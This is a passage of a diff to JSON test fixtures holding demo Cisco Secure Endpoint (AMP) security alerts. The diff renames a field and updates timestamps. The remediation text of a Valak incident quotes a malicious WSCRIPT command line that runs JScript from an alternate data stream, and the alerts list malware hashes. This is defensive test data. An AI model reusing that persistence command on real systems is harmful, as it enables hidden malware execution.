                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"timestamp\":1610711992,\"timestamp_nanoseconds\":155518026,\"date\":\"2021-01-15T11:59:52+00:00\",\"event_type\":\"SecureX Threat Hunting Incident\",\"event_type_id\":1107296344,\"connector_guid\":\"test_connector_guid\",\"severity\":\"Critical\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Threat_Hunting\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"87:c2:d9:a2:8c:74\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"threat_hunting\":{\"incident_report_guid\":\"6e5292d5-248c-49dc-839d-201bcba64562\",\"incident_hunt_guid\":\"4bdbaf20-020f-4bb5-9da9-585da0e07817\",\"incident_title\":\"Valak Variant\",\"incident_summary\":\"The host Demo_Threat_Hunting is compromised by a Valak malware variant.  Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information.  Based on the event details listed and the techniques used, we recommend the host in question be investigated further.\",\"incident_remediation\":\"We recommend the following:\\r\\n\\r\\n- Isolation of the affected hosts from the network\\r\\n- Perform forensic investigation\\r\\n    - Review all activity performed by the user\\r\\n    - Upload any suspicious files to ThreatGrid for analysis\\r\\n    - Search the registry for data \\\"var config = ( COMMAND_C2\\\" and remove the key\\r\\n    - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\\\Users\\\\Public\\\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\\r\\n    - Remove the Alternate Data Stream file located C:\\\\Users\\\\Public\\\\PowerManagerSpm.jar:LocalZone.\\r\\n- If possible, reimage the affected system to prevent potential unknown persistence methods.\",\"incident_id\":416,\"tactics\":[{\"name\":\"Defense Evasion\",\"description\":\"\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\\n\\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\\n\",\"external_id\":\"TA0005\",\"mitre_name\":\"tactic\",\"mitre_url\":\"https://attack.mitre.org/tactics/TA0005\"}],\"techniques\":[{\"name\":\"Data from Local System\",\"description\":\"\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may do this using a \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\\\"https://attack.mitre.org/software/S0106\\\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. Some adversaries may also use \u003ca href=\\\"https://attack.mitre.org/techniques/T1119\\\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\\n\",\"external_id\":\"T1005\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1005\",\"tactics_names\":\"Collection\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":\"Privileges to access certain files and directories\",\"permissions\":\"\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters\"},{\"name\":\"Scheduled Task/Job\",\"description\":\"\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\\n\",\"external_id\":\"T1053\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1053\",\"tactics_names\":\"Execution, Persistence, Privilege Escalation\",\"platforms\":\"Windows, Linux, macOS\",\"system_requirements\":null,\"permissions\":\"Administrator, SYSTEM, User\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters, Windows event logs\"},{\"name\":\"Scripting\",\"description\":\"\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and \u003ca href=\\\"https://attack.mitre.org/techniques/T1086\\\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\\n\\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\\\"https://attack.mitre.org/techniques/T1193\\\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\\\"https://attack.mitre.org/techniques/T1203\\\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\\n\\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)\u003c/p\u003e\\n\",\"external_id\":\"T1064\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1064\",\"tactics_names\":\"Defense Evasion, Execution\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":null,\"permissions\":\"User\",\"data_sources\":\"Process monitoring, File monitoring, Process command-line parameters\"}],\"severity\":\"critical\",\"incident_start_time\":1610707688,\"incident_end_time\":1592478770},\"tactics\":[{\"name\":\"Defense Evasion\",\"description\":\"\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\\n\\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\\n\",\"external_id\":\"TA0005\",\"mitre_name\":\"tactic\",\"mitre_url\":\"https://attack.mitre.org/tactics/TA0005\"}],\"techniques\":[{\"name\":\"Data from Local System\",\"description\":\"\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may do this using a \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\\\"https://attack.mitre.org/software/S0106\\\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. Some adversaries may also use \u003ca href=\\\"https://attack.mitre.org/techniques/T1119\\\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\\n\",\"external_id\":\"T1005\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1005\",\"tactics_names\":\"Collection\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":\"Privileges to access certain files and directories\",\"permissions\":\"\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters\"},{\"name\":\"Scheduled Task/Job\",\"description\":\"\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\\n\",\"external_id\":\"T1053\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1053\",\"tactics_names\":\"Execution, Persistence, Privilege Escalation\",\"platforms\":\"Windows, Linux, macOS\",\"system_requirements\":null,\"permissions\":\"Administrator, SYSTEM, User\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters, Windows event logs\"},{\"name\":\"Scripting\",\"description\":\"\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and \u003ca href=\\\"https://attack.mitre.org/techniques/T1086\\\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\\n\\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\\\"https://attack.mitre.org/techniques/T1193\\\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\\\"https://attack.mitre.org/techniques/T1203\\\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\\n\\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)\u003c/p\u003e\\n\",\"external_id\":\"T1064\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1064\",\"tactics_names\":\"Defense Evasion, Execution\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":null,\"permissions\":\"User\",\"data_sources\":\"Process monitoring, File monitoring, Process command-line parameters\"}]}}",
                 "kind": "alert"
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -43,52 +73,7 @@
                         "incident_title": "Valak Variant",
                         "incident_id": 416,
                         "incident_end_time": "2020-06-18T11:12:50.000Z",
-                        "techniques": [
-                            {
-                                "mitre_name": "technique",
-                                "tactics_names": "Collection",
-                                "system_requirements": "Privileges to access certain files and directories",
-                                "permissions": "",
-                                "name": "Data from Local System",
-                                "description": "\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\n\n\u003cp\u003eAdversaries may do this using a \u003ca href=\"https://attack.mitre.org/techniques/T1059\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\"https://attack.mitre.org/software/S0106\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. Some adversaries may also use \u003ca href=\"https://attack.mitre.org/techniques/T1119\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\n",
-                                "external_id": "T1005",
-                                "mitre_url": "https://attack.mitre.org/techniques/T1005",
-                                "data_sources": "File monitoring, Process monitoring, Process command-line parameters",
-                                "platforms": "Linux, macOS, Windows"
-                            },
-                            {
-                                "mitre_name": "technique",
-                                "tactics_names": "Execution, Persistence, Privilege Escalation",
-                                "permissions": "Administrator, SYSTEM, User",
-                                "name": "Scheduled Task/Job",
-                                "description": "\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\n\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\n",
-                                "external_id": "T1053",
-                                "mitre_url": "https://attack.mitre.org/techniques/T1053",
-                                "data_sources": "File monitoring, Process monitoring, Process command-line parameters, Windows event logs",
-                                "platforms": "Windows, Linux, macOS"
-                            },
-                            {
-                                "mitre_name": "technique",
-                                "tactics_names": "Defense Evasion, Execution",
-                                "permissions": "User",
-                                "name": "Scripting",
-                                "description": "\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\"https://attack.mitre.org/techniques/T1059\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\n\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and \u003ca href=\"https://attack.mitre.org/techniques/T1086\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\n\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\"https://attack.mitre.org/techniques/T1193\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\"https://attack.mitre.org/techniques/T1203\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\n\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)\u003c/p\u003e\n",
-                                "external_id": "T1064",
-                                "mitre_url": "https://attack.mitre.org/techniques/T1064",
-                                "data_sources": "Process monitoring, File monitoring, Process command-line parameters",
-                                "platforms": "Linux, macOS, Windows"
-                            }
-                        ],
                         "incident_start_time": "2021-01-15T10:48:08.000Z",
-                        "tactics": [
-                            {
-                                "name": "Defense Evasion",
-                                "description": "\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\n\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\n",
-                                "mitre_name": "tactic",
-                                "external_id": "TA0005",
-                                "mitre_url": "https://attack.mitre.org/tactics/TA0005"
-                            }
-                        ],
                         "incident_summary": "The host Demo_Threat_Hunting is compromised by a Valak malware variant.  Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information.  Based on the event details listed and the techniques used, we recommend the host in question be investigated further.",
                         "incident_remediation": "We recommend the following:\r\n\r\n- Isolation of the affected hosts from the network\r\n- Perform forensic investigation\r\n    - Review all activity performed by the user\r\n    - Upload any suspicious files to ThreatGrid for analysis\r\n    - Search the registry for data \"var config = ( COMMAND_C2\" and remove the key\r\n    - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\r\n    - Remove the Alternate Data Stream file located C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone.\r\n- If possible, reimage the affected system to prevent potential unknown persistence methods.",
                         "incident_report_guid": "6e5292d5-248c-49dc-839d-201bcba64562",
@@ -205,7 +190,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:41.546087563Z",
+                "ingested": "2021-09-27T00:41:08.619284815Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180352115244794000,\"timestamp\":1610709638,\"timestamp_nanoseconds\":279000000,\"date\":\"2021-01-15T11:20:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:ZVETJ.18gs.1201\",\"detection_id\":\"6180352115244793858\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"wsymqyv90.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Local\\\\Temp\\\\OUTLOOK_TEMP\\\\wsymqyv90.exe\",\"identity\":{\"sha256\":\"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40\",\"sha1\":\"70aef829bec17195e6c8ec0e6cba0ed39f97ba48\",\"md5\":\"e2f5dcd966e26d54329e8d79c7201652\"},\"parent\":{\"process_id\":4040,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -216,7 +201,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.GenericKD:ZVETJ.18gs.1201",
                     "computer": {
                         "active": true,
@@ -307,7 +292,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:41.546089852Z",
+                "ingested": "2021-09-27T00:41:08.619286777Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180351977805840000,\"timestamp\":1610709606,\"timestamp_nanoseconds\":548000000,\"date\":\"2021-01-15T11:20:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:ZVETJ.18gs.1201\",\"detection_id\":\"6180351977805840385\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"wsymqyv90.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Local\\\\Temp\\\\OUTLOOK_TEMP\\\\wsymqyv90.exe\",\"identity\":{\"sha256\":\"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40\",\"sha1\":\"70aef829bec17195e6c8ec0e6cba0ed39f97ba48\",\"md5\":\"e2f5dcd966e26d54329e8d79c7201652\"},\"parent\":{\"process_id\":4040,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -318,7 +303,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.GenericKD:ZVETJ.18gs.1201",
                     "computer": {
                         "active": true,
@@ -394,7 +379,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:41.546091935Z",
+                "ingested": "2021-09-27T00:41:08.619288557Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159258594551267000,\"timestamp\":1610707507,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-15T10:45:07+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159258594551267599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"iodnxvg.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\iodnxvg.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -405,7 +390,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.DFC.MalParent",
                     "computer": {
                         "active": true,
@@ -507,13 +492,13 @@
             "event": {
                 "severity": 3,
                 "action": "DFC Threat Detected",
-                "ingested": "2021-09-13T18:06:41.546093998Z",
+                "ingested": "2021-09-27T00:41:08.619290355Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":978000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006662\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55810,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}",
                 "id": "6180341055704007000",
                 "kind": "alert"
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "DFC.CustomIPList",
                     "computer": {
                         "active": true,
@@ -617,13 +602,13 @@
             "event": {
                 "severity": 3,
                 "action": "DFC Threat Detected",
-                "ingested": "2021-09-13T18:06:41.546096107Z",
+                "ingested": "2021-09-27T00:41:08.619292104Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":978000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006657\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55805,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}",
                 "id": "6180341055704007000",
                 "kind": "alert"
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "DFC.CustomIPList",
                     "computer": {
                         "active": true,
@@ -727,13 +712,13 @@
             "event": {
                 "severity": 3,
                 "action": "DFC Threat Detected",
-                "ingested": "2021-09-13T18:06:41.546098190Z",
+                "ingested": "2021-09-27T00:41:08.619293833Z",
